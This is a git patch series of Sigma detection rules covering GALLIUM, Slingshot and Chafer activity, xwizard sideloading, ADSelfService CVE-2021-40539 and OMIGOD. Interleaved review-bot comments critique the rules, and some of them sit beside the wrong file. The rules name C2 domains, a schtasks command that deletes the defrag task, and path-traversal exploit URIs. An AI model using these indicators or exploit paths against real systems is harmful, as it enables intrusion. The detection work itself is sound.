@@ -1,20 +1,16 @@ -action: global title: GALLIUM Artefacts +id: 440a56bf-7873-4439-940a-1c8a671073c2 status: experimental description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. author: Tim Burrell date: 2020/02/07 +modified: 2021/09/19 references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) tags: - attack.credential_access - attack.command_and_control -falsepositives: - - unknown -level: high ---- -id: 440a56bf-7873-4439-940a-1c8a671073c2 logsource: product: windows category: process_creation @@ -41,34 +37,6 @@ detection: - 'f201504bd96e81d0d350c3a8332593ee1c9e09de' - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2' condition: exec_selection ---- -id: 3db10f25-2527-4b79-8d4b-471eb900ee29 -logsource: - product: windows - service: dns-server -detection: - c2_selection: - EventID: 257 - QNAME: - - 'asyspy256.ddns.net' - - 'hotkillmail9sddcc.ddns.net' - - 'rosaf112.ddns.net' - - 'cvdfhjh1231.myftp.biz' - - 'sz2016rose.ddns.net' - - 'dffwescwer4325.myftp.biz' - - 'cvdfhjh1231.ddns.net' - condition: c2_selection ---- -id: 18739897-21b1-41da-8ee4-5b786915a676 -logsource: - product: windows - category: process_creation -detection: - legitimate_process_path: - Image|contains: - - ':\Program Files(x86)\' - - ':\Program Files\' - legitimate_executable: - sha1: - - 'e570585edc69f9074cb5e8a790708336bd45ca0f' - condition: legitimate_executable and not legitimate_process_path +falsepositives: + - unknown +level: high \ No newline at end of file From faff9e6db731b22a9c37d27ef0fd02433d21aa54 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Sun, 19 Sep 2021 11:36:40 +0200 Subject: [PATCH 0984/1367] spli win_apt_slingshot.yml --- rules/windows/builtin/win_apt_slingshot.yml | 26 +++++++++++++++++ .../file_event_apt_unidentified_nov_18.yml | 1 + ....yml => proces_creation_apt_slingshot.yml} | 29 +++++-------------- 3 files changed, 35 insertions(+), 21 deletions(-) create mode 100644 rules/windows/builtin/win_apt_slingshot.yml rename rules/windows/process_creation/{win_apt_slingshot.yml => proces_creation_apt_slingshot.yml} (63%) diff --git a/rules/windows/builtin/win_apt_slingshot.yml b/rules/windows/builtin/win_apt_slingshot.yml new file mode 100644 index 00000000..520aa2e2 --- /dev/null +++ b/rules/windows/builtin/win_apt_slingshot.yml @@ -0,0 +1,26 @@ +title: Defrag Deactivation +id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 +related: + - id: 958d81aa-8566-4cea-a565-59ccd4df27b0 + type: derived +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +author: Florian Roth, Bartlomiej Czyz (@bczyz1) +date: 2019/03/04 +modified: 2021/09/19 +references: + - https://securelist.com/apt-slingshot/84312/ +tags: + - attack.persistence + - attack.s0111 +logsource: + product: windows + service: security + definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success' +detection: + selection: + EventID: 4701 + TaskName: '\Microsoft\Windows\Defrag\ScheduledDefrag' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file diff --git a/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml b/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml index bf65f672..cf9ea41c 100644 --- a/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml +++ b/rules/windows/file_event/file_event_apt_unidentified_nov_18.yml 
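Review bot: The security-log rule only matches `EventID: 4701` (scheduled task disabled), while its process_creation sibling in this same commit also looks for `/delete`; deleting the `ScheduledDefrag` task produces 4699 (scheduled task deleted), not 4701, so that half of the technique is invisible here. Use a list, `EventID:` / `  - 4699` / `  - 4701`, keeping the `TaskName` match. The rule also has no `status:` field, which the Turla rules split earlier in this series set to `experimental`.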
@@ -19,6 +19,7 @@ logsource: product: windows category: file_event detection: + selection: TargetFilename|contains: 'ds7002.lnk' condition: selection level: high \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_slingshot.yml b/rules/windows/process_creation/proces_creation_apt_slingshot.yml similarity index 63% rename from rules/windows/process_creation/win_apt_slingshot.yml rename to rules/windows/process_creation/proces_creation_apt_slingshot.yml index 14205108..b726d27b 100755 --- a/rules/windows/process_creation/win_apt_slingshot.yml +++ b/rules/windows/process_creation/proces_creation_apt_slingshot.yml @@ -1,26 +1,19 @@ -action: global title: Defrag Deactivation +id: 958d81aa-8566-4cea-a565-59ccd4df27b0 +description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group author: Florian Roth, Bartlomiej Czyz (@bczyz1) date: 2019/03/04 -modified: 2020/11/05 -description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group +modified: 2021/09/19 references: - https://securelist.com/apt-slingshot/84312/ tags: - attack.persistence - attack.s0111 -detection: - condition: all of them -falsepositives: - - Unknown -level: medium ---- -id: 958d81aa-8566-4cea-a565-59ccd4df27b0 logsource: category: process_creation product: windows detection: - selection1: + selection: Image|endswith: '\schtasks.exe' CommandLine|contains: - '/delete' @@ -28,13 +21,7 @@ detection: CommandLine|contains|all: - '/TN' - '\Microsoft\Windows\Defrag\ScheduledDefrag' ---- -id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 -logsource: - product: windows - service: security - definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success' -detection: - selection3: - EventID: 4701 - TaskName: '\Microsoft\Windows\Defrag\ScheduledDefrag' + condition: selection +falsepositives: + - Unknown +level: medium \ No newline at end of file 
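Review bot: The renamed file is `proces_creation_apt_slingshot.yml` (`rename to` line of the diff header) — `proces` is missing an `s`, which breaks the `process_creation_*.yml` naming the rest of this series is adopting and anything that globs on it. The rule body in the `@@ -1,26 +1,19 @@` hunk also lacks a `status:` field, which the split rules elsewhere in this series set to `experimental`. The `selection` map requires `Image|endswith: '\schtasks.exe'` together with the `CommandLine|contains|all` pair, but the rest of the `CommandLine|contains` list lies between the two hunks, so I cannot confirm the full `/delete`/disable set.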
From d5108502a2b68ad2e5b691b530de7bc6ceb9d020 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sun, 19 Sep 2021 11:48:20 +0200 Subject: [PATCH 0985/1367] split win_apt_chafer_mar18.yml --- .../builtin/win_apt_chafer_mar18_security.yml | 37 ++++++++++++++ .../builtin/win_apt_chafer_mar18_system.yml | 34 +++++++++++++ ...=> process_creationn_apt_chafer_mar18.yml} | 50 ++++--------------- .../registry_event_apt_chafer_mar18.yml | 36 +++++++++++++ 4 files changed, 116 insertions(+), 41 deletions(-) create mode 100644 rules/windows/builtin/win_apt_chafer_mar18_security.yml create mode 100644 rules/windows/builtin/win_apt_chafer_mar18_system.yml rename rules/windows/process_creation/{win_apt_chafer_mar18.yml => process_creationn_apt_chafer_mar18.yml} (62%) mode change 100755 => 100644 create mode 100644 rules/windows/registry_event/registry_event_apt_chafer_mar18.yml diff --git a/rules/windows/builtin/win_apt_chafer_mar18_security.yml b/rules/windows/builtin/win_apt_chafer_mar18_security.yml new file mode 100644 index 00000000..370db0c5 --- /dev/null +++ b/rules/windows/builtin/win_apt_chafer_mar18_security.yml 
@@ -0,0 +1,37 @@ +title: Chafer Activity +id: c0580559-a6bd-4ef6-b9b7-83703d98b561 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 + type: derived +description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 +references: + - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ +tags: + - attack.persistence + - attack.g0049 + - attack.t1053 # an old one + - attack.t1053.005 + - attack.s0111 + - attack.t1050 # an old one + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071 # an old one + - attack.t1071.004 +date: 2018/03/23 +modified: 2021/09/19 +author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +logsource: + product: windows + service: security +detection: + selection_service: + EventID: 4698 + TaskName: + - 'SC Scheduled Scan' + - 'UpdatMachine' + condition: selection_service +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/builtin/win_apt_chafer_mar18_system.yml b/rules/windows/builtin/win_apt_chafer_mar18_system.yml new file mode 100644 index 00000000..c17e00d0 --- /dev/null +++ b/rules/windows/builtin/win_apt_chafer_mar18_system.yml 
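Review bot: `TaskName:` is an exact match on `'SC Scheduled Scan'` and `'UpdatMachine'`, but the 4698 event records the task path, which for a root-level task is `\SC Scheduled Scan` with a leading backslash — the slingshot rule in this series writes its 4701 `TaskName` that way. Either prefix the values (`- '\SC Scheduled Scan'`, `- '\UpdatMachine'`) or switch to `TaskName|endswith:` so the match survives both forms; please verify against a sample event before changing. Twelve tags are copied into this file although it only observes task creation, so `attack.t1112` and `attack.t1071.004` no longer describe what it detects.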
@@ -0,0 +1,34 @@ +title: Chafer Activity +id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 +description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 +references: + - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ +tags: + - attack.persistence + - attack.g0049 + - attack.t1053 # an old one + - attack.t1053.005 + - attack.s0111 + - attack.t1050 # an old one + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071 # an old one + - attack.t1071.004 +date: 2018/03/23 +modified: 2021/09/19 +author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +logsource: + product: windows + service: system +detection: + selection_service: + EventID: 7045 + ServiceName: + - 'SC Scheduled Scan' + - 'UpdatMachine' + condition: selection_service +falsepositives: + - Unknown +level: critical \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_chafer_mar18.yml b/rules/windows/process_creation/process_creationn_apt_chafer_mar18.yml old mode 100755 new mode 100644 similarity index 62% rename from rules/windows/process_creation/win_apt_chafer_mar18.yml rename to rules/windows/process_creation/process_creationn_apt_chafer_mar18.yml index ad32e036..39d28e4a --- a/rules/windows/process_creation/win_apt_chafer_mar18.yml +++ b/rules/windows/process_creation/process_creationn_apt_chafer_mar18.yml @@ -1,5 +1,8 @@ -action: global title: Chafer Activity +id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 + type: derived description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 references: - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ 
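Review bot: None of the three Chafer rules produced by this commit (this system-log rule, the security-log one and the registry one) carries a `status:` field, whereas the Turla rules split two commits earlier are `status: experimental`; add `status: experimental` under `id:` so the files match the attribute set the Sigma specification expects. This file is the one the other two declare as their `related` parent, so it is the natural place to start. The tag list is copied verbatim although this rule only observes service installation (7045); trimming `attack.t1053*`, `attack.t1112` and `attack.t1071*` here is optional but would make the split worth more.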
@@ -17,47 +20,8 @@ tags: - attack.t1071 # an old one - attack.t1071.004 date: 2018/03/23 -modified: 2020/08/26 +modified: 2021/09/19 author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community -detection: - condition: 1 of them -falsepositives: - - Unknown -level: critical ---- -id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 -logsource: - product: windows - service: system -detection: - selection_service: - EventID: 7045 - ServiceName: - - 'SC Scheduled Scan' - - 'UpdatMachine' ---- -id: c0580559-a6bd-4ef6-b9b7-83703d98b561 -logsource: - product: windows - service: security -detection: - selection_service: - EventID: 4698 - TaskName: - - 'SC Scheduled Scan' - - 'UpdatMachine' ---- -id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 -logsource: - category: registry_event - product: windows -detection: - selection_reg1: - TargetObject|endswith: - - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UMe' - - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UT' ---- -id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 logsource: category: process_creation product: windows @@ -78,3 +42,7 @@ detection: - '\nslookup.exe' - '-q=TXT' ParentImage|contains: '\Autoit' + condition: 1 of them +falsepositives: + - Unknown +level: critical diff --git a/rules/windows/registry_event/registry_event_apt_chafer_mar18.yml b/rules/windows/registry_event/registry_event_apt_chafer_mar18.yml new file mode 100644 index 00000000..a1ee3e87 --- /dev/null +++ b/rules/windows/registry_event/registry_event_apt_chafer_mar18.yml 
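Review bot: The renamed target is `process_creationn_apt_chafer_mar18.yml` (double `n`, see the `rename to` line) — a typo that breaks the `process_creation_*.yml` naming the rest of this series introduces. The restored `condition: 1 of them` ORs every selection in the file, but the selections themselves lie between the two hunks (file lines 23–41 are not shown), so I cannot confirm none of them is a filter that `1 of them` would now count as a positive match — worth a glance, since the condition previously lived in the global header. A `status:` field is also missing, as in the sibling Chafer files.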
@@ -0,0 +1,36 @@ +title: Chafer Activity +id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 +related: + - id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 + type: derived +description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 +references: + - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ +tags: + - attack.persistence + - attack.g0049 + - attack.t1053 # an old one + - attack.t1053.005 + - attack.s0111 + - attack.t1050 # an old one + - attack.t1543.003 + - attack.defense_evasion + - attack.t1112 + - attack.command_and_control + - attack.t1071 # an old one + - attack.t1071.004 +date: 2018/03/23 +modified: 2021/09/19 +author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +logsource: + category: registry_event + product: windows +detection: + selection_reg1: + TargetObject|endswith: + - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UMe' + - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UT' + condition: selection_reg1 +falsepositives: + - Unknown +level: critical \ No newline at end of file From 6286cf80cc9586ca6bfe45712e5e6b0ce5e93963 Mon Sep 17 00:00:00 2001 
From: frack113 Date: Mon, 20 Sep 2021 09:31:04 +0200 Subject: [PATCH 0986/1367] fix duplicate name file --- ...mon_uac_bypass_winsat.yml => file_event_uac_bypass_winsat.yml} | 0 .../{sysmon_uac_bypass_wmp.yml => file_event_uac_bypass_wmp.yml} | 0 ...uac_bypass_winsat.yml => registry_event_uac_bypass_winsat.yml} | 0 ...ysmon_uac_bypass_wmp.yml => registry_event_uac_bypass_wmp.yml} | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename rules/windows/file_event/{sysmon_uac_bypass_winsat.yml => file_event_uac_bypass_winsat.yml} (100%) rename rules/windows/file_event/{sysmon_uac_bypass_wmp.yml => file_event_uac_bypass_wmp.yml} (100%) rename rules/windows/registry_event/{sysmon_uac_bypass_winsat.yml => registry_event_uac_bypass_winsat.yml} (100%) rename rules/windows/registry_event/{sysmon_uac_bypass_wmp.yml => registry_event_uac_bypass_wmp.yml} (100%) diff --git a/rules/windows/file_event/sysmon_uac_bypass_winsat.yml b/rules/windows/file_event/file_event_uac_bypass_winsat.yml similarity index 100% rename from rules/windows/file_event/sysmon_uac_bypass_winsat.yml rename to rules/windows/file_event/file_event_uac_bypass_winsat.yml diff --git a/rules/windows/file_event/sysmon_uac_bypass_wmp.yml b/rules/windows/file_event/file_event_uac_bypass_wmp.yml similarity index 100% rename from rules/windows/file_event/sysmon_uac_bypass_wmp.yml rename to rules/windows/file_event/file_event_uac_bypass_wmp.yml diff --git a/rules/windows/registry_event/sysmon_uac_bypass_winsat.yml b/rules/windows/registry_event/registry_event_uac_bypass_winsat.yml similarity index 100% rename from rules/windows/registry_event/sysmon_uac_bypass_winsat.yml rename to rules/windows/registry_event/registry_event_uac_bypass_winsat.yml 
diff --git a/rules/windows/registry_event/sysmon_uac_bypass_wmp.yml b/rules/windows/registry_event/registry_event_uac_bypass_wmp.yml
similarity index 100%
rename from rules/windows/registry_event/sysmon_uac_bypass_wmp.yml
rename to rules/windows/registry_event/registry_event_uac_bypass_wmp.yml
From 4e794fe3e7127108ce00c07a7cac75c3cac74102 Mon Sep 17 00:00:00 2001
From: phantinuss
Date: Mon, 20 Sep 2021 10:37:24 +0200
Subject: [PATCH 0987/1367] xwizard dll sideloading
---
 .../win_dll_sideload_xwizard.yml | 24 +++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 rules/windows/process_creation/win_dll_sideload_xwizard.yml
diff --git a/rules/windows/process_creation/win_dll_sideload_xwizard.yml b/rules/windows/process_creation/win_dll_sideload_xwizard.yml
new file mode 100644
index 00000000..0f03e6f9
--- /dev/null
+++ b/rules/windows/process_creation/win_dll_sideload_xwizard.yml
@@ -0,0 +1,24 @@
+title: Xwizard DLL Sideloading
+id: 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1
+status: experimental
+description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll
+references:
+ - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/
+ - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
+author: Christian Burkard
+date: 2021/09/20
+tags:
+ - attack.defense_evasion
+ - attack.t1574.002
+logsource:
+ category: process_creation
+ product: windows
+detection:
+ selection:
+ Image|endswith: '\xwizard.exe'
+ filter:
+ Image|startswith: '?:\Windows\System32\'
+ condition: selection and not filter
+falsepositives:
+ - Unlikely
+level: high
From 6c630502dcf8cd3cc190d11065f7ab13c3384a65 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Mon, 20 Sep 2021 10:54:53 +0200
Subject: [PATCH 0988/1367] Update win_dll_sideload_xwizard.yml
---
 rules/windows/process_creation/win_dll_sideload_xwizard.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
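Review bot: `Image|endswith: '\xwizard.exe'` keys the detection on the file name, so an attacker who drops the binary next to a malicious `xwizards.dll` and renames it is not seen; adding the PE original name as an alternative, `selection:` / `  - Image|endswith: '\xwizard.exe'` / `  - OriginalFileName: 'xwizard.exe'` (a list of maps is OR), keeps the `not filter` logic and catches the rename on Sysmon-sourced events. The process_creation event also never shows which DLL was loaded, so a companion image_load rule on `ImageLoaded|endswith: '\xwizards.dll'` outside `\Windows\System32\` would evidence the sideload itself that the description promises. The `?:` prefix in `filter` is Sigma's single-character wildcard, so the System32 exclusion is already drive-agnostic as written.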
diff --git a/rules/windows/process_creation/win_dll_sideload_xwizard.yml b/rules/windows/process_creation/win_dll_sideload_xwizard.yml index 0f03e6f9..0efad466 100644 --- a/rules/windows/process_creation/win_dll_sideload_xwizard.yml +++ b/rules/windows/process_creation/win_dll_sideload_xwizard.yml @@ -17,7 +17,7 @@ detection: selection: Image|endswith: '\xwizard.exe' filter: - Image|startswith: '?:\Windows\System32\' + Image|startswith: 'C:\Windows\System32\' condition: selection and not filter falsepositives: - Unlikely From 25a407e24f594e343dfcc25f209731540c7724c9 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Mon, 20 Sep 2021 10:56:37 +0200 Subject: [PATCH 0989/1367] Update win_dll_sideload_xwizard.yml --- rules/windows/process_creation/win_dll_sideload_xwizard.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_dll_sideload_xwizard.yml b/rules/windows/process_creation/win_dll_sideload_xwizard.yml index 0efad466..a9102fa1 100644 --- a/rules/windows/process_creation/win_dll_sideload_xwizard.yml +++ b/rules/windows/process_creation/win_dll_sideload_xwizard.yml @@ -20,5 +20,5 @@ detection: Image|startswith: 'C:\Windows\System32\' condition: selection and not filter falsepositives: - - Unlikely + - Windows installed on non-C drive level: high From 79d2144424f6da8f0781b4ec1e2c0c88973c9fc2 Mon Sep 17 00:00:00 2001 From: Tobias Michalski Date: Mon, 20 Sep 2021 12:26:46 +0200 Subject: [PATCH 0990/1367] feat: Rule for ADSelfService cve_2021_40539 --- .../web/web_cve_2021_40539_adselfservice.yml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 rules/web/web_cve_2021_40539_adselfservice.yml diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml new file mode 100644 index 00000000..4a89ae31 --- /dev/null +++ b/rules/web/web_cve_2021_40539_adselfservice.yml 
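Review bot: Replacing `'?:\Windows\System32\'` with `'C:\Windows\System32\'` in `filter` narrows the exclusion to the C: drive; `?` is Sigma's single-character wildcard, so the original already covered any system drive, and the very next commit has to document `Windows installed on non-C drive` as a false positive. If a backend's handling of `?` motivated the change (the commit message does not say), `Image|endswith: ':\Windows\System32\xwizard.exe'` gives the same drive-agnostic exclusion using only the `endswith` modifier.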
@@ -0,0 +1,19 @@
+title: Detects ADSelfService exploitation
+id: 6702b13c-e421-44cc-ab33-42cc25570f11
+status: experimental
+description: Detects various logs that occur on explatiation of ADSelfService cve_2021_40539
+author: Tobias Michalski, Max Altgelt
+date: 2021/09/20
+logsource:
+ category: logfile
+detection:
+ keywords:
+ - '/help/admin-guide/Reports/ReportGenerate.jsp'
+ - '/ServletApi/../RestApi/LogonCustomization'
+ - '/ServletApi/../RestAPI/Connection'
+ - 'Keystore will be created for "admin"'
+ - 'The status of keystore creation is Upload!'
+ condition: keywords
+falsepositives:
+ - Unknown, Maybe initial installation of ADSelfService
+level: low
From 2b843e58ee0d1b8febbb8ae8aa24a1f0477a8134 Mon Sep 17 00:00:00 2001
From: Tobias Michalski
Date: Mon, 20 Sep 2021 12:28:47 +0200
Subject: [PATCH 0991/1367] fix: added references
---
 .../web/web_cve_2021_40539_adselfservice.yml | 20 ++++++++++---------
 1 file changed, 11 insertions(+), 9 deletions(-)
diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml
index 4a89ae31..ed480f16 100644
--- a/rules/web/web_cve_2021_40539_adselfservice.yml
+++ b/rules/web/web_cve_2021_40539_adselfservice.yml
@@ -3,17 +3,19 @@ id: 6702b13c-e421-44cc-ab33-42cc25570f11 status: experimental description: Detects various logs that occur on explatiation of ADSelfService cve_2021_40539 author: Tobias Michalski, Max Altgelt +references: + - https://us-cert.cisa.gov/ncas/alerts/aa21-259a date: 2021/09/20 logsource: - category: logfile + category: logfile detection: - keywords: - - '/help/admin-guide/Reports/ReportGenerate.jsp' - - '/ServletApi/../RestApi/LogonCustomization' - - '/ServletApi/../RestAPI/Connection' - - 'Keystore will be created for "admin"' - - 'The status of keystore creation is Upload!' - condition: keywords + keywords: + - '/help/admin-guide/Reports/ReportGenerate.jsp' + - '/ServletApi/../RestApi/LogonCustomization' + - '/ServletApi/../RestAPI/Connection' + - 'Keystore will be created for "admin"' + - 'The status of keystore creation is Upload!' + condition: keywords falsepositives: - - Unknown, Maybe initial installation of ADSelfService + - Unknown, Maybe initial installation of ADSelfService level: low From 56069a21960a297ba757a67c6301de1dc700da5b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 20 Sep 2021 13:07:31 +0200 Subject: [PATCH 0992/1367] Update web_cve_2021_40539_adselfservice.yml --- .../web/web_cve_2021_40539_adselfservice.yml | 21 +++++++++---------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml index ed480f16..70bd3447 100644 --- a/rules/web/web_cve_2021_40539_adselfservice.yml +++ b/rules/web/web_cve_2021_40539_adselfservice.yml 
@@ -1,21 +1,20 @@ title: Detects ADSelfService exploitation id: 6702b13c-e421-44cc-ab33-42cc25570f11 status: experimental -description: Detects various logs that occur on explatiation of ADSelfService cve_2021_40539 +description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 author: Tobias Michalski, Max Altgelt references: - https://us-cert.cisa.gov/ncas/alerts/aa21-259a date: 2021/09/20 logsource: - category: logfile + category: webserver detection: - keywords: - - '/help/admin-guide/Reports/ReportGenerate.jsp' - - '/ServletApi/../RestApi/LogonCustomization' - - '/ServletApi/../RestAPI/Connection' - - 'Keystore will be created for "admin"' - - 'The status of keystore creation is Upload!' - condition: keywords + selection: + c-uri|contains: + - '/help/admin-guide/Reports/ReportGenerate.jsp' + - '/ServletApi/../RestApi/LogonCustomization' + - '/ServletApi/../RestAPI/Connection' + condition: selection falsepositives: - - Unknown, Maybe initial installation of ADSelfService -level: low + - Unknown +level: high From 4424bc9c5da6b753b7d45d9c0216d85b75bcd78b Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 20 Sep 2021 13:20:39 +0200 Subject: [PATCH 0993/1367] Update web_cve_2021_40539_adselfservice.yml --- rules/web/web_cve_2021_40539_adselfservice.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml index 70bd3447..0c2d2d00 100644 --- a/rules/web/web_cve_2021_40539_adselfservice.yml +++ b/rules/web/web_cve_2021_40539_adselfservice.yml 
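Review bot: Two of the three `c-uri|contains` values depend on the literal `/../` (`/ServletApi/../RestApi/LogonCustomization`, `/ServletApi/../RestAPI/Connection`); whether that string reaches the log depends on whether the web server or a fronting proxy records the raw request target or the normalised path, and on the traversal form the attacker used (`/./`, `/..;/`, percent-encoded dots). If your source logs the normalised path the rule never fires, so consider a second, lower-confidence selection on the normalised targets, e.g. `c-uri|contains: '/RestAPI/LogonCustomization'` combined with `cs-method: POST` — hedged, since I do not know which forms the CISA advisory enumerates. The hunk also deletes the two keystore log lines outright; if they come from the product's own logs they belong in a separate rule with a matching logsource rather than being dropped, since `category: webserver` was the only thing wrong with keeping them here.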
@@ -1,4 +1,4 @@ -title: Detects ADSelfService exploitation +title: Detects ADSelfService Exploitation id: 6702b13c-e421-44cc-ab33-42cc25570f11 status: experimental description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 From 6dbc369eb5df4ae74f7812131ba48ac954104157 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Mon, 20 Sep 2021 15:51:21 +0200 Subject: [PATCH 0994/1367] Update web_cve_2021_40539_adselfservice.yml --- rules/web/web_cve_2021_40539_adselfservice.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2021_40539_adselfservice.yml b/rules/web/web_cve_2021_40539_adselfservice.yml index 0c2d2d00..b6469958 100644 --- a/rules/web/web_cve_2021_40539_adselfservice.yml +++ b/rules/web/web_cve_2021_40539_adselfservice.yml @@ -1,4 +1,4 @@ -title: Detects ADSelfService Exploitation +title: ADSelfService Exploitation id: 6702b13c-e421-44cc-ab33-42cc25570f11 status: experimental description: Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539 From 61c9c9fb20ed946f2d626fbc257a063b2748665a Mon Sep 17 00:00:00 2001 From: neu5ron Date: Mon, 20 Sep 2021 12:26:01 -0400 Subject: [PATCH 0995/1367] Zeek detection for OMIGOD HTTP RCE Signed-off-by: neu5ron --- .../zeek/zeek_http_omigod_no_auth_rce.yml | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 rules/network/zeek/zeek_http_omigod_no_auth_rce.yml diff --git a/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml b/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml new file mode 100644 index 00000000..4e1f31ed --- /dev/null +++ b/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml 
@@ -0,0 +1,54 @@
+title: OMIGOD HTTP No Authentication RCE
+id: ab6b1a39-a9ee-4ab4-b075-e83acf6e346b
+description: Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request. Verify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP). Within the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.
+author: Nate Guagenti (neu5ron)
+date: 2021/09/20
+modified: 2019/09/20
+references:
+ - https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure
+ - https://twitter.com/neu5ron/status/1438987292971053057?s=20
+tags:
+ - attack.privilege_escalation
+ - attack.initial_access
+ - attack.execution
+ - attack.lateral_movement
+ - attack.t1068
+ - attack.t1190
+ - attack.t1203
+ - attack.t1021.006
+ - attack.t1210
+logsource:
+ product: zeek
+ service: http
+ definition: Enable the builtin Zeek script that logs all HTTP header names by adding "@load policy/protocols/http/header-names" to your local.zeek config file.
The script can be seen here for reference https://github.com/zeek/zeek/blob/master/scripts/policy/protocols/http/header-names.zeek
+detection:
+ selection:
+ status_code: 200
+ uri: /wsman
+ method: POST
+ auth_header:
+ client_header_names|contains: "AUTHORIZATION"
+ too_small_http_client_body:
+ request_body_len: 0
+ #winrm_ports:
+ # id.resp_p:
+ # - 5985
+ # - 5986
+ # - 1270
+ condition: selection and not auth_header and not too_small_http_client_body
+ #condition: selection and winrm_ports and not auth_header and not too_small_http_client_body # Enable this to only perform search on default WinRM ports, however those ports are sometimes changed and therefore this is disabled by default to give a broader coverage of this rule
+falsepositives:
+ - Exploits that were attempted but unsuccessful.
+ - Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips.
+level: high
+fields:
+ - id.orig_h
+ - id.resp_h
+ - id.resp_p
+ - status_code
+ - method
+ - uri
+ - request_body_len
+ - response_body_len
+ - user_agent
+status: stable
From feee70644ff174b17b2135d5a233c48bfafe33cf Mon Sep 17 00:00:00 2001
